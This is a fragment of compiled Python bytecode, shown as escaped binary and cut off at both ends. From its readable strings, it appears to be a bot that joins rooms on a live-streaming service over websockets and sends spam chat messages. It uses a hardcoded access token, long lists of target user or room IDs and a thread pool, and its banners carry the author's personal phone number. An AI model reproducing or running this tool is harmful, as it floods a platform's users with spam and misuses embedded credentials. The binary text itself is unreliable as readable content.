fd\xd0d\xd1d\xd2d\xd3d\xd4d\xd5d\xd6d\xd7d\xd8d\xd9d\xdad\xdbd\xdcd\xddd\xded\xdfd\xe0d\xe1d\xe2d\xe3d\xe4d\xe5d\xe6d\xe7d\xe8d\xe9d\xead\xebd\xecd\xc9d\xedd\xeed\xefd\xf0d\xf1d\xf2d\xf3d\xf4d\xf5d\xf6d\xf7d\xf8d\xf9d\xfad\xfbd\xfcd\xfdd\xfed\xff\x90\x01d\x00\x90\x01d\x01\x90\x01d\x02\x90\x01d\x03\x90\x01d\x04\x90\x01d\x05\x90\x01d\x06\x90\x01d\x07\x90\x01d\x08\x90\x01d\t\x90\x01d\n\x90\x01d\x0b\x90\x01d\x0c\x90\x01d\r\x90\x01d\x0e\x90\x01d\x0f\x90\x01d\x10\x90\x01d\x11\x90\x01d\x12\x90\x01d\x13\x90\x01d\x14\x90\x01d\x15\x90\x01d\x16\x90\x01d\x17\x90\x01d\x18\x90\x01d\x19\x90\x01d\x1a\x90\x01d\x1b\x90\x01d\x1c\x90\x01d\x1d\x90\x01d\x1e\x90\x01d\x1f\x90\x01d \x90\x01d!\x90\x01d"\x90\x01d#\x90\x01d$\x90\x01d%\x90\x01d&\x90\x01d\'\x90\x01d(\x90\x01d)\x90\x01d*\x90\x01d+\x90\x01d,\x90\x01d-\x90\x01d.\x90\x01d/\x90\x01d0\x90\x01d1\x90\x01d2\x90\x01d3\x90\x01d4\x90\x01d5\x90\x01d6\x90\x01d7\x90\x01d8\x90\x01d9\x90\x01d:\x90\x01d;\x90\x01d<\x90\x01d=\x90\x01d>\x90\x01d?\x90\x01d@\x90\x01dA\x90\x01dB\x90\x01dC\x90\x01dD\x90\x01dE\x90\x01dF\x90\x01dG\x90\x01dHg\x83Z\x10\x90\x01dIa\x11\x90\x01dIa\x12\x90\x01dJa\x13\x90\x01dKa\x14\x90\x01dLa\x15\x90\x01dMa\x16e\x04\xa0\x17\xa1\x00a\x18\x90\x01dNa\x19e\x04\xa0\x17\xa1\x00Z\x1ag\x00a\x1bg\x00a\x1c\x90\x01dOa\x1d\x90\x01dPa\x1e\x90\x01dQa\x1f\x90\x01dJa \x90\x01dRa!\x90\x01dIa"\x90\x01dS\x90\x01dS\x90\x01dS\x90\x01dSg\x04a#d\x00a$\x90\x01dPa%\x90\x01dTa&\x90\x01dPa\'\x90\x01dTa(\x90\x01dTa)\x90\x01dJa*\x90\x01dMZ+\x90\x01dUZ,e\x04\xa0\x17\xa1\x00a-\x90\x01dV\x90\x01dW\x84\x00Z.\x90\x01dX\x90\x01dY\x84\x00Z/\x90\x01dZ\x90\x01d[\x84\x00Z0\x90\x01d\\\x90\x01d]\x84\x00Z1\x90\x01d^\x90\x01d_\x84\x00Z2\x90\x01d`\x90\x01da\x84\x00Z3\x90\x01db\x90\x01dc\x84\x00Z4\x90\x01dd\x90\x01de\x84\x00Z5\x90\x01df\x90\x01dg\x84\x00Z6e7\x90\x01dhk\x02\x90\x07r\xeed\x00Z8e9\x90\x01di\x83\x01\x01\x00e9\x90\x01dj\x83\x01\x01\x00e9\x90\x01dk\x83\x01\x01\x00e\x08\xa0:\x90\x01dl\xa1\x01Z;e\r\xa0<\x90\x01dm\xa1\x01\x01\x00e9\x90\x01dj\x83\x01\x01\x00e\x08\xa0:\x90\x01dn\xa1\x01j=Z>e;\xa0\x02\xa1\x00\x90\x01do\x19\x00Z?e\rj@\xa0A\x90\x01dp\xa1\x01\x90\x01dPk\x02\x90\x06r(e.\x83\x00\x01\x00eB\x90\x01dp\x90\x01dq\x83\x02ZCe\t\xa0D\x90\x01dr\x90\x01ds\xa1\x02ZEeC\xa0FeGeE\x83\x01\xa1\x01\x01\x00eC\xa0H\xa1\x00\x01\x00eB\x90\x01dp\x90\x01dt\x83\x02ZIeJeI\xa0K\xa1\x00\x83\x01ZLe9\x90\x01dueGeL\x83\x01\x17\x00\x83\x01\x01\x00e\rj@\xa0A\x90\x01dv\xa1\x01\x90\x01dIk\x02\x90\x06r\x18eB\x90\x01dv\x90\x01dt\x83\x02ZMeJeM\xa0K\xa1\x00\x83\x01ZLe9\x90\x01dweGeL\x83\x01\x17\x00\x83\x01\x01\x00eM\xa0H\xa1\x00\x01\x00eI\xa0H\xa1\x00\x01\x00eN\x83\x00\x01\x00n\xcceB\x90\x01dp\x90\x01dt\x83\x02ZIeJeI\xa0K\xa1\x00\x83\x01ZLeL\x90\x01dx\x14\x00Z8e8e?k\x06\x90\x06rne\r\xa0<\x90\x01dm\xa1\x01\x01\x00e9\x90\x01dy\x83\x01\x01\x00n~e.\x83\x00\x01\x00e9\x90\x01dz\x83\x01\x01\x00e9\x90\x01dueGeL\x83\x01\x17\x00\x83\x01\x01\x00e\rj@\xa0A\x90\x01dv\xa1\x01\x90\x01dIk\x02\x90\x06r\xe6eB\x90\x01dv\x90\x01dt\x83\x02ZMeJeM\xa0K\xa1\x00\x83\x01ZLe9\x90\x01dweGeL\x90\x01dx\x14\x00\x90\x01d{\x17\x00\x83\x01\x17\x00\x83\x01\x01\x00eM\xa0H\xa1\x00\x01\x00eN\x83\x00\x01\x00eI\xa0H\xa1\x00\x01\x00e;\xa0\x02\xa1\x00\x90\x01d|\x19\x00ZOe1\x90\x01d}\x83\x01\x01\x00e\x03\xa0P\x90\x01d~\xa1\x01\x01\x00e\r\xa0<\x90\x01dm\xa1\x01\x01\x00e1\x90\x01d\x7f\x83\x01\x01\x00e/e>\x83\x01\x01\x00e0t\x0f\x83\x01a\x0f\x90\x01d\x80\x90\x01d\x81i\x01ZQeR\x90\x01d\x82\x83\x01ZSeR\x90\x01d\x83\x83\x01ZT\x90\x01d\x84\x90\x01d\x85\x90\x01d\x86\x9c\x02ZUe\x08\xa0:eS\xa1\x01ZVeVjWZWeW\x90\x01d\x87\x90\x01d\x88\x85\x02\x19\x00aXe\x08\xa0:\x90\x01d\x89tX\x17\x00\xa1\x01aYtYa!\x90\x01dTZZe\t\xa0[t\x0f\xa1\x01\x01\x00g\x00Z\\e\x0b\x90\x01d{\x90\x01d\x8a\x8d\x01\x8f$Z]t\x0fD\x00]\x18Z^e\\\xa0_e]\xa0`e6e^\xa1\x02\xa1\x01\x01\x00\x90\x07q\xcaW\x005\x00Q\x00R\x00X\x00d\x01S\x00(\x8b\x01\x00\x00\xe9\x00\x00\x00\x00N)\x01\xda\x11create_connection)\x01\xda\x08datetime)\x02\xda\x12ThreadPoolExecutor\xda\x0cas_completedZ(247448f9ff3bce363bf2e996688cf440c119ddd5Z(fb7cde5a98798f046848a703f5703694df9da3f5Z(e7efd338b1adb91fe6e0ce0ad4ad9830b4a61ba6Z(5df024c2e294a471980f602bac32b93c7a091be3Z(a3c8789943abf28f8a81fe810039a7beb8d1383bZ(8fe0ea72f3805d305483940fb56b0044b89a1d9aZ(610273d5ab3321a9f5f6d7357c85e19918bfd1bfZ(2bff84708b54dfedf5672305f1b91b28bafb5d21Z(36cd412dd0b6d68cb3a632aaa51d3f24df481f26Z(b7b2fb70c5376718931b558cda457f683e70e2bbZ(dad817b84de3e8ae8d8b33759649f0e5ef8765daZ(15d53c09a9a8b23866869a93b0b8fa759d90ed61Z(a9394db8696e262889f2e3e07faa27b35e52985fZ(6745249d89855c002eef8f889dd72278e5023acfZ(2c0dfa2ff9a0d5877175eb5d0a600afdc598073bZ(0c6057e4ce16672256169846ffc9c5e34c893f40Z(eac7cedbfd40570493c446225d1284a32827c94bZ(ceec5a55cc095182bcb770e734124d4aed40bdb8Z(10a3a958ef940441f2be554c578c8f85ea6e8da7Z(e5cb891b335f7f162f059c48071393ec1db361a4Z(a82c51d126608211bd4681fc0514dbb33cab1120Z(bb7e53d33a2da7b34b987ce58f0cecf8c56a883fZ(47e6188ebff00c850e76a6f2aa870cd7c7e340f1Z(44cd0e5f7f44bdd40ccc490c6951c90929cc0e69Z(91e5c61f2e4a1af756f9d747d085204233f09626Z(0aa830daf61f0749363132948b6c698c72214f95Z(4800b8983097cc3bd6b6fbee1e05024cb8d69a5aZ(9152f08748578466df7ebfaea3996583f78a723fZ(6fe0edb1852bfeb8326f2702e18baf04a8e6dd39Z(3cfc91f40115cc11a8a2b2fc3e11b95d0f56de5eZ(a294fd44213b8ebf4b0c1bd856f6af22f4e07170Z(4d8b4f27d7e8fe0c2e28c4c0a0e5459926117564Z(821d6f4df73d2684db634306c9231d7490f2b269Z(53751de76ef873e1836b3c168a18dba1bf65f90bZ(922a4730130ad4ceedbc74623419e43ebfa15faeZ(f3b13523fc68dec4952c8ea191257c2daddc3360Z(46492e24867969a2ecb3fa49b9852efc5aa82339Z(24777c252d2b9beaece91f95735d5017a8329f10Z(aa551af641839f3d39a5d323a92e3778b74ebbb0Z(b50e20226b2523093ecda51ca5cdb701bed1bf54Z(2d31e3629644d9b8e3f52a68e2df421b146bc389Z(436ea6ec379044ba004b4a1f7fb412b264bfd415Z(5f69e76aa68df24e90c9e2bec93587c970848d78Z(8c05b03af799ea4f84319d45936b91402b3da693Z(533eee48caa39650f9bbfebe6957d47c76289f6bZ(c8ed5186f6ef64552376535a61a6eb1f7ad55b05Z(1f91a7f90f7c60ba82ebbbb5987ec8b48386f15azGb31d890f2513a57993e638bc45dbd24f4b9ec8c7 Z(a4efc86e880602d304268e21de5c0bb54949c115Z(91fa9adb4b7046d18ceeb6e13cfd8c782900cbd9Z(1032dbc2587012658ae420f201a26056e9bf7cdbZ(e811d3e7fa2aad93df931ce0f4c533391ad520ffZ(e0893e0fcdd28a11924445c2ded61492b868007aZ(5fa56416902456c6c3c96991189e5b93dd172ddaZ(961f2cbbebcaf757b32e362d645ec7ccba9ee6adZ(1f760f807591e6ef5a6436e542e34b216e38bb75Z(ef0d40af1c132b55f5bef1c4368b1aa8a00097d1Z(f4a241e912803e719668878482768aea07356abdZ(9fcb7e8af9e925b2c5dfb56baea24c649c9733deZ(82589fb39dbcbd394cb2763d6cfdf982636db99bZ(662e763803adea0eace2027d50a3af3eee6c00c8Z(68d97ad6bcdcca33cf8ded93b4cb07ca6bda433fZ(9450fcb7da39f6799f66d49d5d4b5ec983d4deccZ(0c39e1a98ad9e892e61ae6828e3d2a315c2b03d4Z(3fde52e0a35193b82c09eea8178b7804a1d664b5Z(89d83c68ba3ae9607c471acb416d43ff24fc49f3Z(c32ff9b0f5123fe5fab2f891a78e59f9ac44c618Z(5d7a35ae391caa124085aed670c49b3c3019c680Z(27e8c2b2c1709f7813e6f1c5784c2b20bd44a9efZ(fa8f79dda57556ec1a57d71ce64c99684270cbedZ(a8b52a929cdf5a2edc0bf043fb1706df2535890fZ(5a6262049b9b2dd3821ec60fc4a8cbab6a01fa8fZ(ed8e8a0c4d1e1c8acf7a31c808836542e9effbf9Z(57acb40639a224595533a96465e710cb72ac5204Z(335cba7b161af69423e809bf1e6ee70ba9c6513aZ(6bd2a9ea129fffac24d87c7b09cd2fd386ef7284Z(719b4f5f23a44c47df58ea85715c2742a30fa79dZ(0daf82c0ee85d4dcede11748e07fb4fe00a5731eZ(0958bdf41c60a8517441a7781dd3683fabd1e569Z(9912decdd8a6b7664f4268b520b21817e137bac2Z(bca6b642b18fc777d450714cdc37c6a8e63e7a5bZ(5dbd83c9730302acd287ad8061635cbff40f7b9eZ(abe5e994658533204ee9150957be2ef2e6fd7b7aZ(769142c01bdb8e2e21cfa8a837428dcd24eba0e1Z(9ad87b8b98b3cfff0fe6e0ebcb29dc0b6b2f90b7Z(81bf7ffc3a273f0424412971f8b2b0cdec43c6b8Z(f6a52af6f5af3f081aa7ee121eb0db721830a587Z(a59dd850a75bf735adc079d6aeb468cfbd8cc2f1Z(e6104239e8d53d133f9b79b3536234b5d577187bZ(8c65e50923c60c3df05ef048256d27b0d20f3c12Z(7fb03337e72dc351209c69fd88d4eb8b8513c0b1Z(83ec91d286d5a9aa961864905fa04249d13d494bZ(0d0038c514400df8f54222f1b1d237e53301d444Z(75b67e43e118f7c057123c559a1e368bbadb7a8dZ(a94b13c143335570b9e7c2dfa3e5aa8c61d807aaZ(ce7c9a02baaace428dd3dbf37d3c13570b10f636Z(35e803edd263e4aab29b260dba27c0d6c7fbe9ceZ(310d117daf03dfb57fd347d2769db7ed3bcea79fZ(e695f2a1a88a1e415b0a69b209ca4a538cf18df5Z(205aea8a7233425c029276abe6224e4df7170e85Z(0eaa409eba6759c9303741b32638d509a97311e2Z(01a3da48645562b0a1e2e0d50ac5ad7986f6f804Z(ba6290507f2d01197cd23c9335424159e7caec67Z(7c1f3082db36dda7f1c4194c7b8794006f939cf8Z(c9fb296a62a3dfb00e2d27becebef95a7822ebe4Z(be21b9fa029107d6131296b9198ad7195b33ffc4Z(953539ae7e63f1727092982540902cabb8cedd46Z(4946a492fec793132de02298c5877c4046831c48Z(0985828b3f66ad9d008151699331e7d4b7dec151Z(e64bac7fb45eedd1aa826cc4b0838639107fd56aZ(8a00d32178fd553153f6d7a767a239fbca1886cfZ(9246c55a551d67c2462108141f0e5bac4991a517Z(6fcd13983a0142ae804573e34b00904550f574e3Z(2d34a278494f58a5ebb3e67e5a3e12db43b5034bZ(c0ecb8b04d88d5eb49b2373bc16c923ced29c524Z(0eadf1894c07a97244f7ccf84cec1b132cba976cZ(32a0eed4f28e961715feae1ce208c0d07f46c735Z(0ee869c0712c42ad6c8662c17aaecd19fcdf8dd1Z(b7c77a59171502e39c4bf386246384372d47043cZ(46b67351e331fe86331ab097d794cb1589a4a830Z(8b346293305e25699daebf95d14543600cfcbe05Z(a97b4fedec07580b1b3a9c1f9cc00e2e4b7ce4e8Z(cb92f75c76602dae7478fa7519022512deaae9d4Z(440b33dad96b0e7f1be7054076f2cb5179032686Z(7fdee01317e66764629b44627674074cd578d242Z(69e42c08f4995d9ccb539f8ec4bcbcb0da719e3bZ(6057322086bbcac056b1220abe2cba40c56aa611Z(35e09792313363e7da3e0a0d64c987ab81fc43c5Z(6aad3d237c2bb89d2421945afec76ebd1e45f951Z(fb259d300a1e0b4f414d78d571b3a4dfa8a7f1f5Z(c0e830cd6db1d67f83d62a54a675598af3d45591Z(667ea1931450552c34bcf40f9e5c3085bafab416Z(8921300150827e6b58aebb786e0d0f7fa1225f0eZ(f6fdf91cff0c63b909c45a0b3519c54f5fe3eb65Z(ca353f6ca3b9b4f1a5b12f4e875e61478682fca9Z(44eb50e19d565eff8cc9490a54269bfe2b2e35f5Z(1748ea2ed743bb30dabd3ad781ac43aa675c0070Z(3a23ba9f94eda441a41022923ae758f108b5b0cbZ(bfc497beafb62e5daa6f46e3fbbeec9b9a1932b1Z(23008ab0165eca0e22ac3edf2ef99f6c4c1673feZ(234ff63cdc5db19a4d8c7ebc4fc1814918c2fe94Z(1a620e8563dc1c7b05d3d92a1b41daefb16a721bZ(0ca359d8f14fcec9a9fc1f6d9e5334706e260438Z(5b1665a5166c3e8151cb359be5b9e5f52d1c33ffZ(d2cad024e4efae0d62d3243c132044bb57efe38fZ(8a10ad00ac70cea5c403725c6376ab61e1c263daZ(4be632cefd894ef37a93605383389d1693648e76Z(ea6fce6d0d9d47573123d44ab2726b2bb661dcccZ(e0a73368d1cfe253f5112c42518a197706d879f2Z(a273d745616c65b33cbd48e2f40fbe9fa51a0193Z(faf5e91f391565d0a96c5f8399ae04a97c7a2d90Z(35504899a6a87d63de8410a416e9d6288c9ead60Z(bfd7e29e08b8ca6628f0db6a90ecef5d8ccf3121Z(1d5e3136981b32ecb2949d84a0f930a92a9f8891Z(dcde4de30c7899321308defda0a70fe7d922921dZ(1868c239787d73e3d2740899a45ce6f5a1450bf9Z(582265366196ef856292ce52caa4403e53f1fa35Z(f1455b00d12b5419a9b580fcfd028cce998056e4Z(a0683f0f3fc91ebacb08c993b440392b2d225689Z(9899ac8c90cf0e5bc9b3bb327160e438a6b6214fZ(ee0db639f8b3e74ddea3e45c1bfa3bf7bfcaed24Z(8898066bd789638d4bdfc5e3cbdb4bbaa0972104Z(68e6f10a7ac0ce82e25007b3118a224ef6e4b4a1Z(7c279d694095c68035f7f365f284d73923bade0eZ(f50009bfc0ad907f6eda4aa52d96f737caf53be5Z(fb9b218b2b72ff05f5bebad334a7f80b5cdfafa4Z(752cba16e82b5a97822b81f72e3fc2b33fd9b99fZ(b674226dfae89b236add16b2c7df259df380ccc7Z(d467cc6b0bff0054b63b165b24f8af3d0af9602fZ(dc9c9d6c9ed226e02b84115618ab99512bdc77caZ(90c5cc0880c7dd04a20c6a5e2a197f3a01a99d74Z(1099c25fa3b5d607ea1c18165f4b64a72322c440Z(840b720f7c3f3a0e41d04cf2b700bb891805c91dZ(4c31294dc67b5d0669ce1df42fc01362b1b371abZ(a3297d55064ae46ed06892133c342e91df724cb5Z(ee64427066f50170293ea1102fd37b4d035282fbZ(1845ef553445aafe2fcee7bac5005b84044b9db7Z(56cc8c8f42e17523d1baf6efb400b8e9d5e1a1c4Z(4fe8d359aae539007b08888a47dd22e92aa46780Z(4ce1e3cdcfd21ec5ca57148d1ccb3e90c7d51e54Z(8aba4c81ad709b20944c4ee2363d13a7bd9dcebcZ(7d55a161732b472aeb054807b091783654386009Z(3e6065a767e9e8aa5d0b560fe5d6a4b8f3e3b7bbZ(6d1a8a2fd2d154dc1eb97e61ba356635b8c4aac7Z(3570107f623c545f6053acbc1479538f9518d652Z(cf3231fb3dc2e1bfee17f0a48b333f99889692c6Z(b9bd71ae4b6714cc9cfa2edd1ebf21077a9efc16Z(2632f430e3313782b2174d61aae30c3b01e64d2aZ(a28494e7770f062d8f641d8e3c13ecd68a43ade1Z(8fe2d160c20bc3b782f84952e43ad9cc251dea87Z(f2631bbdd75355ca9872ddad1119a2fc9738050aZ(f96916bcc4d2b5b3d2ddf282f763a4908aa11cacZ(1faf226217de0f5dd95dea38c951f46715167338Z(bd8aefe8ac2c917d9a9c8698c866207880d9f43bZ\t210952568Z\t211666779Z\t211666796Z\t210986817Z\t211666926Z\t210991267Z\t211928532Z\t212155151Z\t212155171Z\t212155195Z\t212155336Z\t212155447Z\t212155476Z\t211932351Z\t211932300Z\t211891521Z\t211926810Z\t212276640Z\t212276652Z\t212276660Z\t212276667Z\t212276680Z\t212088228Z\t212216426Z\t212216471Z\t212216525Z\t212216607Z\t211739827Z\t212216666Z\t211928155Z\t212218056Z\t212284374Z\t212284401Z\t212284411Z\t212284456Z\t212284472Z\t212284478Z\t212284488Z\t212284559Z\t212284612Z\t212284634Z\t212284655Z\t212284674Z\t212284685Z\t212284753Z\t212284880Z\t212284888Z\t212288338Z\t212288348Z\t212288356Z\t212288369Z\t212288379Z\t212288396Z\t212288421Z\t212288432Z\t211524168Z\t211524205Z\t211492108Z\t211495701Z\t211495753Z\t211495795Z\t211467950Z\t211468011Z\t211468342Z\t211468440Z\t211468476Z\t211468500Z\t211469937Z\t211454531Z\t211454565Z\t211454712Z\t211421338Z\t211421764Z\t211421443Z\t211421932Z\t211421943Z\t211651986Z\t211652047Z\t211652083Z\t211652104Z\t211652109Z\t211652380Z\t211652225Z\t211652394Z\t211652434Z\t211652446Z\t211652469Z\t211652487Z\t211652696Z\t211652938Z\t211653001Z\t211460000Z\t210887962Z\t211460128Z\t210814565Z\t210888121Z\t210888136Z\t211460167Z\t211460246Z\t211653281Z\t211653744Z\t211653734Z\t211655322Z\t211655459Z\t211655379Z\t211651970Z\t211651988Z\t211652010Z\t211652025Z\t211652040Z\t211651933Z\t211651944Z\t211652086Z\t211652107Z\t211652139Z\t211652218Z\t211652247Z\t211652259Z\t211655690Z\t211652277Z\t211652335Z\t211654301Z\t211654391Z\t211654449Z\t211510287Z\t211655771Z\t211511379Z\t211660668Z\t211660710Z\t210946801T\xe9\x01\x00\x00\x00Z\x05tidurZ\x03xyxZ\x03xyzz\r{"div":"hai"}\xe9\x0f\x00\x00\x00F\xe9\x03\x00\x00\x00Z\x05jsjajZ\x04lagu\xda\x00Z\x03xwxc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sB\x00\x00\x00t\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x02d\x02\x83\x01\x01\x00t\x02d\x03\x83\x01\x01\x00t\x02d\x04\x83\x01\x01\x00t\x02t\x03\xa0\x04\xa1\x00\x83\x01\x01\x00t\x02d\x05\x83\x01\x01\x00t\x02d\x06\x83\x01\x01\x00d\x00S\x00)\x07N\xda\x05clearz-\x1b[1;33;42mDibuat Oleh Wibu :v yang suka oppai\xf5\r\x00\x00\x00with love \xe2\x9d\xa4\xfa\x12CP : 085155415154\nz\rVERSI : vvvip\xfa\x0b\x1b[1;37;40m\n\xa9\x05\xda\x02os\xda\x06system\xda\x05printr\x03\x00\x00\x00Z\x03now\xa9\x00r\x12\x00\x00\x00r\x12\x00\x00\x00r\t\x00\x00\x00\xda\x05signa\x82\x01\x00\x00s\x0e\x00\x00\x00\x00\x02\n\x02\x08\x01\x08\x01\x08\x01\x0c\x01\x08\x02r\x13\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sJ\x00\x00\x00t\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x02d\x02\x83\x01\x01\x00t\x02d\x03\x83\x01\x01\x00t\x02d\x04\x83\x01\x01\x00t\x02t\x03\xa0\x04\xa1\x00\x83\x01\x01\x00t\x02d\x05\x83\x01\x01\x00t\x02|\x00\x83\x01\x01\x00t\x02d\x06\x83\x01\x01\x00d\x00S\x00)\x07Nr\n\x00\x00\x00z(\x1b[1;34;42mDibuat Oleh Wibu Tachi Dayo :vr\x0b\x00\x00\x00r\x0c\x00\x00\x00u \x00\x00\x00VERSI : Onii Chan~ (~\xef\xbf\xa3\xe2\x96\xbd\xef\xbf\xa3)~r\r\x00\x00\x00r\x0e\x00\x00\x00)\x01\xda\x04pessr\x12\x00\x00\x00r\x12\x00\x00\x00r\t\x00\x00\x00\xda\x04sign\x8e\x01\x00\x00s\x10\x00\x00\x00\x00\x02\n\x02\x08\x01\x08\x01\x08\x01\x0c\x01\x08\x01\x08\x01r\x15\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s$\x00\x00\x00g\x00}\x01|\x00D\x00]\x16}\x02|\x02|\x01k\x07r\x08|\x01\xa0\x00|\x02\xa1\x01\x01\x00q\x08|\x01S\x00\xa9\x01N)\x01\xda\x06append)\x03Z\tduplicateZ\nfinal_listZ\x03numr\x12\x00\x00\x00r\x12\x00\x00\x00r\t\x00\x00\x00\xda\x06Remove\x9a\x01\x00\x00s\n\x00\x00\x00\x00\x01\x04\x01\x08\x01\x08\x01\x0c\x01r\x18\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s2\x00\x00\x00|\x00d\x01\x17\x00D\x00]$}\x01t\x00j\x01\xa0\x02|\x01\xa1\x01\x01\x00t\x00j\x01\xa0\x03\xa1\x00\x01\x00t\x04\xa0\x05d\x02\xa1\x01\x01\x00q\x08d\x00S\x00)\x03N\xda\x01\ng\n\xd7\xa3p=\n\xb7?)\x06\xda\x03sys\xda\x06stdout\xda\x05write\xda\x05flush\xda\x04time\xda\x05sleep)\x02\xda\x01s\xda\x01cr\x12\x00\x00\x00r\x12\x00\x00\x00r\t\x00\x00\x00\xda\tslowprint\xa1\x01\x00\x00s\x08\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\n\x01r"\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s\xf0\x00\x00\x00t\x00\xa0\x01|\x01\xa1\x01}\x02t\x02t\x03\x83\x01\x01\x00t\x03d\x017\x00a\x03|\x02d\x02\x19\x00d\x03\x19\x00d\x04\x19\x00}\x03|\x02d\x02\x19\x00d\x03\x19\x00d\x05\x19\x00}\x04|\x02d\x06\x19\x00}\x05|\x05d\x07k\x02r~t\x02|\x02d\x02\x19\x00d\x08\x19\x00\x83\x01\x01\x00|\x02d\x02\x19\x00d\x08\x19\x00}\x06|\x06d\td\x00\x85\x02\x19\x00}\x07|\x07d\nk\x02r~d\x0b}\x07|\x05d\x0ck\x02r\xa2|\x02d\x02\x19\x00d\r\x19\x00}\x08|\x02d\x02\x19\x00d\x03\x19\x00d\x0e\x19\x00}\t|\x05d\x0fk\x02r\xd6|\x02d\x02\x19\x00d\x03\x19\x00d\x04\x19\x00a\x04t\x02t\x04\x83\x01\x01\x00t\x05t\x04\x83\x01t\x06k\x06r\xd6|\x00\xa0\x07\xa1\x00\x01\x00d\x10t\x08\x17\x00d\x11\x17\x00}\n|\x00\xa0\t|\n\xa1\x01\x01\x00d\x00S\x00)\x12Nr\x06\x00\x00\x00\xda\x04dataZ\x06author\xda\x02idZ\x08nicknameZ\x05eventZ\x0clive_presentZ\x07sticker\xe9\x08\x00\x00\x00Z\x07myheartz\nkado balonZ\x0clive_message\xda\x07message\xda\x03tagZ\nlive_blockz\x82{"appversion":"4.3.16","event":"live_message","token":"ce5c43e71af39a1d73ccdd82b1fa89b6feb65454","useragent":"Android","message":"z\x02"})\n\xda\x04json\xda\x05loadsr\x11\x00\x00\x00\xda\x03cou\xda\x04iddd\xda\x03str\xda\x05idbot\xda\x05close\xda\tpesanspam\xda\x04send)\x0b\xda\x02wsr&\x00\x00\x00Z\x04chatZ\x03uidZ\x04nickZ\x03evnZ\x04giftZ\x04kadoZ\x03psnr\'\x00\x00\x00Z\x06pesan2r\x12\x00\x00\x00r\x12\x00\x00\x00r\t\x00\x00\x00\xda\non_message\xa7\x01\x00\x00s,\x00\x00\x00\x00\x1f\n\x04\x08\x01\x08\x02\x10\x01\x10\x01\x08\x03\x08\x01\x10\x01\x0c\x01\x0c\x01\x08\x01\x04\x03\x08\x01\x0c\x02\x10\x02\x08\x01\x10\x01\x08\x02\x0c\x01\x08\x05\x0c\x01r2\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x0c\x00\x00\x00t\x00|\x01\x83\x01\x01\x00d\x00S\x00r\x16\x00\x00\x00\xa9\x01r\x11\x00\x00\x00)\x02r1\x00\x00\x00\xda\x05errorr\x12\x00\x00\x00r\x12\x00\x00\x00r\t\x00\x00\x00\xda\x08on_error\xed\x01\x00\x00s\x02\x00\x00\x00\x00\x01r5\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x0c\x00\x00\x00t\x00d\x01\x83\x01\x01\x00d\x00S\x00)\x02Nz\x0e### closed ###r3\x00\x00\x00\xa9\x01r1\x00\x00\x00r\x12\x00\x00\x00r\x12\x00\x00\x00r\t\x00\x00\x00\xda\x08on_close\xf0\x01\x00\x00s\x02\x00\x00\x00\x00\x01r7\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00s$\x00\x00\x00\x87\x00f\x01d\x01d\x02\x84\x08}\x01t\x00\xa0\x01|\x01d\x03\xa1\x02\x01\x00t\x02d\x04\x83\x01\x01\x00d\x00S\x00)\x05Nc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x17\x00\x00\x00s2\x00\x00\x00d\x01t\x00\x17\x00d\x02\x17\x00t\x01\x17\x00d\x03\x17\x00t\x02\x17\x00d\x04\x17\x00}\x01\x88\x00\xa0\x03|\x01\xa1\x01\x01\x00t\x04d\x05\x83\x01\x01\x00d\x00S\x00)\x06Nz\x0b{"live_id":z\n,"token":"z\x10","event":"live_z2join","appversion":"4.3.16","useragent":"Android"}z\x04====)\x05\xda\x05slink\xda\x06tokenl\xda\x08joinmoder0\x00\x00\x00r\x11\x00\x00\x00)\x02\xda\x04argsZ\x05pesanr6\x00\x00\x00r\x12\x00\x00\x00r\t\x00\x00\x00\xda\x03run\xf4\x01\x00\x00s\x06\x00\x00\x00\x00\x03\x1c\x01\n\x06z\x14on_open.<locals>.runr\x12\x00\x00\x00Z\x03aaa)\x03\xda\x06thread\xda\x10start_new_threadr\x11\x00\x00\x00)\x02r1\x00\x00\x00r<\x00\x00\x00r\x12\x00\x00\x00r6\x00\x00\x00r\t\x00\x00\x00\xda\x07on_open\xf3\x01\x00\x00s\x06\x00\x00\x00\x00\x01\x0c\x0b\x0c\x01r?\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x82\x00\x00\x00|\x00a\x00d\x01d\x02|\x00\x17\x00d\x03\x9c\x02}\x01t\x01j\x02d\x04t\x03\x17\x00d\x05\x17\x00d\x06\x17\x00d\x05\x17\x00t\x04|\x01d\x07\x8d\x03}\x02|\x02\xa0\x05\xa1\x00d\x08\x19\x00}\x03|\x03d\tk\x02rvt\x06\xa0\x07d\n\xa1\x01\x01\x00t\x06j\x08d\x0bt\x03\x17\x00t\tt\nt\x0bd\x0c\x8d\x04}\x04t\x0c|\x04_\x0c|\x04\xa0\r\xa1\x00\x01\x00n\x08t\x0ed\r\x83\x01\x01\x00d\x00S\x00)\x0eN\xfa\x0bMozilla/5.0z\x06Token 